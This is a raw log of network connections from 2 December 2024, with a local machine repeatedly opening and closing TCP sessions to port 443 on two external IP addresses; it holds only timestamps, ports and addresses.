                                                                  Dec 2, 2024 18:45:53.206661940 CET44350010172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:53.267896891 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:53.267934084 CET44350011172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:53.268301010 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:53.269032955 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:53.269042969 CET44350011172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:54.543046951 CET44350011172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:54.546397924 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:54.546397924 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:54.546408892 CET44350011172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:54.550117970 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:54.550122976 CET44350011172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:55.328259945 CET44350011172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:55.328366995 CET44350011172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:55.328394890 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:55.330014944 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:55.330248117 CET50011443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:55.330257893 CET44350011172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:55.407588959 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:55.407625914 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:55.408195019 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:55.408490896 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:55.408507109 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:56.708583117 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:56.708800077 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:57.252490997 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:57.252510071 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:57.252562046 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:57.252567053 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:57.918749094 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:57.918807983 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:57.918817043 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:57.918849945 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:57.918865919 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:57.918931007 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:57.919157028 CET50012443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:57.919171095 CET44350012172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:58.030097008 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:58.030133963 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:58.030198097 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:58.030502081 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:58.030513048 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:59.322307110 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:59.326069117 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:59.326694012 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:59.326694012 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:59.326704025 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:59.326721907 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:00.102200031 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:00.102257967 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:00.102273941 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:00.102319956 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:00.102324009 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:00.102365017 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:00.102637053 CET50013443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:00.102647066 CET44350013172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:00.242551088 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:00.242595911 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:00.242666006 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:00.243066072 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:00.243077993 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:01.491523027 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:01.494127989 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:01.494548082 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:01.494554996 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:01.494812012 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:01.494816065 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173602104 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173655033 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.173664093 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173693895 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.173701048 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173728943 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.173732042 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.173769951 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.174165010 CET50014443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.174180984 CET44350014172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.874695063 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.874723911 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:02.874876976 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.875205994 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:02.875217915 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.165347099 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.165436983 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.166078091 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.166083097 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.166392088 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.166399002 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.861850023 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.861970901 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.861977100 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:04.862052917 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.862276077 CET50015443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:04.862288952 CET44350015172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:05.080375910 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:05.080420971 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:05.080698013 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:05.081187963 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:05.081202984 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:06.370137930 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:06.370229959 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:06.370709896 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:06.370722055 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:06.370914936 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:06.370919943 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.192090988 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.192183018 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.192213058 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.192336082 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.192833900 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.192900896 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.193165064 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.193223000 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.193223000 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.193237066 CET44350016172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.194998026 CET50016443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.247909069 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.247956991 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:07.248083115 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.248416901 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:07.248429060 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:08.520876884 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:08.520945072 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:08.521856070 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:08.521867037 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:08.522448063 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:08.522455931 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.276623964 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.276719093 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.276741982 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.276880980 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.276992083 CET50017443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.277014017 CET44350017172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.339863062 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.339910030 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:09.340456009 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.343909025 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:09.343923092 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:10.558180094 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:10.558249950 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:10.558942080 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:10.558953047 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:10.559250116 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:10.559256077 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.316338062 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.316479921 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.316581011 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.316989899 CET50018443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.317011118 CET44350018172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.388175964 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.388231039 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:11.388438940 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.388706923 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:11.388717890 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:12.732551098 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:12.734710932 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:12.734710932 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:12.734741926 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:12.737920046 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:12.737926960 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.425648928 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.425738096 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.426382065 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.426382065 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.597407103 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.597466946 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.597544909 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.598038912 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.598058939 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:13.814843893 CET50019443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:13.814874887 CET44350019172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:14.887506008 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:14.887790918 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:14.888389111 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:14.888389111 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:14.888400078 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:14.888415098 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.589500904 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.589554071 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.589581013 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.589601040 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.589618921 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.589653015 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.589953899 CET50020443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.589967966 CET44350020172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.709645987 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.709693909 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:15.709752083 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.710237026 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:15.710247040 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:16.974603891 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:16.974776983 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:16.975419044 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:16.975428104 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:16.975752115 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:16.975758076 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.727924109 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.728018999 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.728069067 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.728069067 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.728409052 CET50021443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.728429079 CET44350021172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.809017897 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.809089899 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:17.809161901 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.809571981 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:17.809592009 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.099457026 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.099576950 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.100027084 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.100037098 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.100255013 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.100260973 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.944760084 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.944823980 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.944853067 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.944870949 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:19.944897890 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.944921017 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.945287943 CET50022443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:19.945301056 CET44350022172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:20.029954910 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:20.030009031 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:20.030086994 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:20.030488968 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:20.030502081 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:21.325748920 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:21.328327894 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:21.389941931 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:21.389941931 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:21.389956951 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:21.389970064 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035419941 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035469055 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035487890 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035531044 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035537004 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035583973 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.035586119 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035629988 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035912037 CET50023443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.035931110 CET44350023172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.147063017 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.147108078 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:22.147190094 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.147610903 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:22.147624016 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:23.410845041 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:23.410993099 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:23.411554098 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:23.411559105 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:23.411748886 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:23.411751986 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.186405897 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.186502934 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.186603069 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.186603069 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.194647074 CET50024443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.194665909 CET44350024172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.683084965 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.683135986 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:24.683273077 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.683818102 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:24.683829069 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:25.947431087 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:25.947534084 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:25.947948933 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:25.947956085 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:25.948246956 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:25.948251963 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:26.713272095 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:26.713368893 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:26.713641882 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:26.714803934 CET50025443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:26.714823008 CET44350025172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:26.844037056 CET50026443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:26.844084978 CET44350026172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:26.844332933 CET50026443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:26.847958088 CET50026443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:26.847970009 CET44350026172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:28.130604982 CET44350026172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:28.130666018 CET50026443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:28.131540060 CET50026443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:28.131545067 CET44350026172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:28.131931067 CET50026443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:28.131934881 CET44350026172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:28.812309027 CET44350026172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:28.812411070 CET44350026172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:28.812948942 CET50026443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:28.815983057 CET50026443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:28.815999031 CET44350026172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:28.984271049 CET50027443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:28.984324932 CET44350027172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:28.987598896 CET50027443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:28.991952896 CET50027443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:28.991970062 CET44350027172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:30.326982021 CET44350027172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:30.327063084 CET50027443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:30.327758074 CET50027443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:30.327768087 CET44350027172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:30.328136921 CET50027443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:30.328142881 CET44350027172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:31.035429001 CET44350027172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:31.035521030 CET44350027172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:31.036109924 CET50027443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:31.036376953 CET50027443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:31.036391973 CET44350027172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:31.111990929 CET50028443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:31.112034082 CET44350028172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:31.112406015 CET50028443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:31.112525940 CET50028443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:31.112545967 CET44350028172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:46:32.134918928 CET50028443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:46:32.340148926 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:32.340174913 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:32.340243101 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:32.340650082 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:32.340662003 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:33.626857996 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:33.626933098 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:33.659621000 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:33.659650087 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:33.659879923 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:33.659889936 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:33.660012960 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:33.660062075 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:35.226528883 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:35.226635933 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:35.226639986 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:35.226743937 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:35.226866007 CET50029443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:35.226877928 CET44350029104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:35.287372112 CET50030443192.168.2.5104.21.68.89
